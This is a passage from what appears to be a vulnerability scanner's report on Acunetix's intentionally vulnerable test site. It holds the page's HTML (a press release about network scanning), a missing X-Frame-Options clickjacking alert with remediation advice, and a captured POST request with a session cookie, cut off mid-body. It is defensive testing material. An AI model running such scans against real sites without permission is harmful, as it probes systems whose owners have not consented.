RlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+IHWQJk8lQv/gFjjcBT7DDZEugHw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (456 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 Content-Length: 10985 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (10985 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgI